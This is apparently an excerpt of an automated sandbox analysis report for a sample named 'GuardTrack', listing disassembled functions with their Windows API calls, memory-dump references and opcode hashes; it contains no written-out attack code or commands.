GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0061B2EB
__swprintf.LIBCMT ref: 0061B304
SetErrorMode.KERNEL32(00000000,00000001,00000000,00640980), ref: 0061B342

Strings

%lu, xrefs: 0061B2FE

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: d9e407c5900d94053f54b9b1ef5cc6ebd67bed33b4fddaa5e12ed770b7073475
Instruction ID: efaecf86aab3b2cfda28193f2b806c2b0ea46b31d33c91fbaf712e18766369b7
Opcode Fuzzy Hash: d9e407c5900d94053f54b9b1ef5cc6ebd67bed33b4fddaa5e12ed770b7073475
Instruction Fuzzy Hash: D1217135A00109AFCB10DFA5C849DEEBBB9FF89704B144069F905D7392DB71EA45CB61

Function 0060AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B

Part of subcall function 0060AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0060AA6F
Part of subcall function 0060AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0060AA82
Part of subcall function 0060AA52: GetCurrentThreadId.KERNEL32 ref: 0060AA89
Part of subcall function 0060AA52: AttachThreadInput.USER32(00000000), ref: 0060AA90

GetFocus.USER32 ref: 0060AC2A

Part of subcall function 0060AA9B: GetParent.USER32(?), ref: 0060AAA9

GetClassNameW.USER32(?,?,00000100), ref: 0060AC73
EnumChildWindows.USER32(?,0060ACEB), ref: 0060AC9B
__swprintf.LIBCMT ref: 0060ACB5

Strings

%s%d, xrefs: 0060ACAF

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: b89c591d744ac22a46607edd5ff3b2e452f536d216090016b8d4cfc30788a378
Instruction ID: 63b9c3101a0cefcabc95ad9301db0c54a846608191eb85a771bcc9f55cea8eeb
Opcode Fuzzy Hash: b89c591d744ac22a46607edd5ff3b2e452f536d216090016b8d4cfc30788a378
Instruction Fuzzy Hash: A811D275280305ABEF55BFE0CD86FEA376EAB85300F004079FE08AA1C2DA705945DB75

Function 006122E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00612318

Strings

REMOVE, xrefs: 0061231E
KEYS, xrefs: 0061232F
EXISTS, xrefs: 00612340
APPEND, xrefs: 00612351

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 724b7f247182f2803529c2c9493630aea5e155bbce104ed56005a5c7780f7422
Instruction ID: 943643e875a169fadf99b988586b4ec1e59d5f2b242e382190d6bb401417e328
Opcode Fuzzy Hash: 724b7f247182f2803529c2c9493630aea5e155bbce104ed56005a5c7780f7422
Instruction Fuzzy Hash: 2D11703090011ADFCF00EF94C9A05EDBBB6FF56304F10506AD81097392DB325E56CB40

Function 0062F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0062F2F0
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0062F320
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0062F453
CloseHandle.KERNEL32(?), ref: 0062F4D4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 65ed32e2b6fe4f299bb3230b91e3f1f7aef4fd1ceb23c4b09553873517a4c00e
Instruction ID: 28372512dbe3abc8ad341099fa3597855f514c77d4eb2e1a93984591f9bf0ab1
Opcode Fuzzy Hash: 65ed32e2b6fe4f299bb3230b91e3f1f7aef4fd1ceb23c4b09553873517a4c00e
Instruction Fuzzy Hash: 168180756007119FD724EF28D846B6ABBE6BF84710F14882DF9999B393D7B0AC408F91

Function 00630697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

Part of subcall function 0063147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0063040D,?,?), ref: 00631491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0063075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0063079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006307E3
RegCloseKey.ADVAPI32(?,?), ref: 0063080F
RegCloseKey.ADVAPI32(00000000), ref: 0063081C

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 873c2d6bfed0f223adf3b3f6c87f65f73c5be9d4350d7028ce2adcb1d706d0e5
Instruction ID: 6fdb49d77d6d6070ba32ee59dfe9c46e7184ecbe82929b9b2fd0a9c597177ece
Opcode Fuzzy Hash: 873c2d6bfed0f223adf3b3f6c87f65f73c5be9d4350d7028ce2adcb1d706d0e5
Instruction Fuzzy Hash: D4517C31208205AFD714EF64C895F6ABBFAFF85704F04491DF595872A2DB31E909CB92

Function 0062DFB1 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0062E010
GetProcAddress.KERNEL32(00000000,?), ref: 0062E093
GetProcAddress.KERNEL32(00000000,00000000), ref: 0062E0AF
GetProcAddress.KERNEL32(00000000,?), ref: 0062E0F0
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0062E10A

Part of subcall function 005C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00617E51,?,?,00000000), ref: 005C4041
Part of subcall function 005C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00617E51,?,?,00000000,?,?), ref: 005C4065

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: f41f7fc3f25a56070e11ddc9906581e955de4b664fa14cd0a724a1a2ce690df7
Instruction ID: 10bf082d29deb278fb7a3123889c903b442c70c59633469b116ed61997c1de7b
Opcode Fuzzy Hash: f41f7fc3f25a56070e11ddc9906581e955de4b664fa14cd0a724a1a2ce690df7
Instruction Fuzzy Hash: 93517B34A0061ADFCB10EFA8D488D9DBBF5FF49310B048069E905AB352D731AD56CF91

Function 0061EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0061EC62
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0061EC8B
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0061ECCA

Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0061ECEF
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0061ECF7

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: e10198f0739141acfbde614c22a7a2b84fff79b01408988ece7b6755dd1f2e6b
Instruction ID: e56b3b162b165f7036fa057335a4c25ef294668cefa3d130c2b69b43499fcd93
Opcode Fuzzy Hash: e10198f0739141acfbde614c22a7a2b84fff79b01408988ece7b6755dd1f2e6b
Instruction Fuzzy Hash: 19514E35A00506DFDB11EF64C985AAEBBF5FF49310B188099E849AB3A2CB31ED51CF50

Function 0063A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12754e03c020d723a04fa669b49ff53d1d139161c253229a783ed466647a4fd0
Instruction ID: 8b1dc8ce14b6cb1841ce8f34efb1f737a9cde807b8c8884b8ad10750b1d76bc9
Opcode Fuzzy Hash: 12754e03c020d723a04fa669b49ff53d1d139161c253229a783ed466647a4fd0
Instruction Fuzzy Hash: BA41F339900114AFD714CFA8CCC8FE9BBB7EB0A350F140265E99AA73D1C630AD41EAD1

Function 005B2714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 005B2727
ScreenToClient.USER32(006777B0,?), ref: 005B2744
GetAsyncKeyState.USER32(00000001), ref: 005B2769
GetAsyncKeyState.USER32(00000002), ref: 005B2777

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: a9173b5127e241a7d0353e618f7e8388e7bd164797930b064aeb02c8fe90e879
Instruction ID: 1ce0ab4cdae34a2da3cc69a59e8bc7bc07566066d01ba09459bd57fd38800159
Opcode Fuzzy Hash: a9173b5127e241a7d0353e618f7e8388e7bd164797930b064aeb02c8fe90e879
Instruction Fuzzy Hash: AE41B335504119FFDF199F69C848AEDBF75FB0A324F10835AF868962A0CB30AD51DBA4

Function 005B52B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005B52E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005B534A
TranslateMessage.USER32(?), ref: 005B5356
DispatchMessageW.USER32(?), ref: 005B5360

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: 17d0e20f57937709ac257be1e67ddeee084b8596603491269ca2f3ba920390b8
Instruction ID: 5459e45de29dd56248be04c046b071432079b150ba077d6803619f1b324fd454
Opcode Fuzzy Hash: 17d0e20f57937709ac257be1e67ddeee084b8596603491269ca2f3ba920390b8
Instruction Fuzzy Hash: F2310130508B469AEB3CCF64DC44BE97FF9BB01340F24186AE576862E1E2B1B885D721

Function 006095D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 006095E8
PostMessageW.USER32(?,00000201,00000001), ref: 00609692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0060969A
PostMessageW.USER32(?,00000202,00000000), ref: 006096A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006096B0

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 9dcf3e5e876d4327a05ee15432e167270607cd91d80aea2695c37de685723df9
Instruction ID: 89399f28d7916205e5d0203e1b6f02a8d850f68f23bf1a0acbe5d8ea44bf0f5f
Opcode Fuzzy Hash: 9dcf3e5e876d4327a05ee15432e167270607cd91d80aea2695c37de685723df9
Instruction Fuzzy Hash: BB31BC71900219EBEB18CFA8D94CADE7BB7EB45315F104219F925AB2D1C3B19924DBA0

Function 0060BD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0060BD9D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0060BDBA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0060BDF2
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0060BE18
_wcsstr.LIBCMT ref: 0060BE22

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 9be52e588e2c1288fcf5fd766842c7fffc589ed4de19643f43036cf979ae2fb0
Instruction ID: 0ba36e28a5cf3e1d5efc1f82e1499a2b97571a9413546164c3c5350dcf7bf4df
Opcode Fuzzy Hash: 9be52e588e2c1288fcf5fd766842c7fffc589ed4de19643f43036cf979ae2fb0
Instruction Fuzzy Hash: 6D21F832244205BBFB295B39DC09EBB7F9EDF85750F10902AF909DA2D1DB61CC409260

Function 0063B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3

GetWindowLongW.USER32(?,000000F0), ref: 0063B804
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0063B829
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0063B841
GetSystemMetrics.USER32(00000004), ref: 0063B86A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0062155C,00000000), ref: 0063B888

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 2e5b37187a96d28db720c40dc9a3b01c5460424c0898a4378fd30c0cb4d92a21
Instruction ID: 40d9f426dba6e0011a6736644f1e920837fae036a9955bb7e2a310930ff4eb88
Opcode Fuzzy Hash: 2e5b37187a96d28db720c40dc9a3b01c5460424c0898a4378fd30c0cb4d92a21
Instruction Fuzzy Hash: 8421A331A14225AFCB149F38CC08BAA3BAAFB45320F106738FA25D72E0D7309951CBD0

Function 00609EBF Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00609ED8

Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00609F0A
__itow.LIBCMT ref: 00609F22
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00609F4A
__itow.LIBCMT ref: 00609F5B

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: a42368216f9d5e94eecf3d0015c02bd3cd54e2eda427a2573099016293e37598
Instruction ID: a83594875dd44a70252c8fac0a69101f2bdf24801f883ff870662535ba883464
Opcode Fuzzy Hash: a42368216f9d5e94eecf3d0015c02bd3cd54e2eda427a2573099016293e37598
Instruction Fuzzy Hash: 8E21B8316412167FDB149AA58C49EEF7BABEB86750F044015F905D7282D670C94197E1

Function 00626138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00626159
GetForegroundWindow.USER32 ref: 00626170
GetDC.USER32(00000000), ref: 006261AC
GetPixel.GDI32(00000000,?,00000003), ref: 006261B8
ReleaseDC.USER32(00000000,00000003), ref: 006261F3

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 74175ab859d89ae1e5361e4b5c1c523aa8a3a33965e1e19b02f93da32e1045ad
Instruction ID: 2d81aabb22f252f07c0caa9e167ca775c73864d1a6c25e92cd9c7b565d1b76ff
Opcode Fuzzy Hash: 74175ab859d89ae1e5361e4b5c1c523aa8a3a33965e1e19b02f93da32e1045ad
Instruction Fuzzy Hash: DB21A475A00614AFD714EF69DC88A9ABBF6EF89310F04846DF94A97352CB30BC40CB90

Function 005B16CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005B1729
SelectObject.GDI32(?,00000000), ref: 005B1738
BeginPath.GDI32(?), ref: 005B174F
SelectObject.GDI32(?,00000000), ref: 005B1778

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 13feb9896e80ef71e3dd128d59046734e6f24e1536decbc9e6cf9bb955b63263
Instruction ID: 53751007796286e4fab8cb9133d16c22ba45c60baa66781ba67311522f401512
Opcode Fuzzy Hash: 13feb9896e80ef71e3dd128d59046734e6f24e1536decbc9e6cf9bb955b63263
Instruction Fuzzy Hash: 2A21C130914608EBEB148FA4DC08BA93FAAFB01311F144235F819931A0EB70A991CBD6

Function 0060C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0060C84C
_memcmp.LIBCMT ref: 0060C86A
_memcmp.LIBCMT ref: 0060C87D
_memcmp.LIBCMT ref: 0060C895
_memcmp.LIBCMT ref: 0060C8AD

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 5e4de66e4ce22636b522d5fdf4dcf67420a5c34d222d0642a5d22f0df11fcb00
Instruction ID: adc7f40c49ceb4f89005f881d5660cb84cdf1923b40033e447b8feeda4e1ad6d
Opcode Fuzzy Hash: 5e4de66e4ce22636b522d5fdf4dcf67420a5c34d222d0642a5d22f0df11fcb00
Instruction Fuzzy Hash: 5A01F9626805153BD21C63145E86FF77B5EEA60365F04C226FD0696782F760DE11C2E8

Function 0061504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00615075
__beginthreadex.LIBCMT ref: 00615093
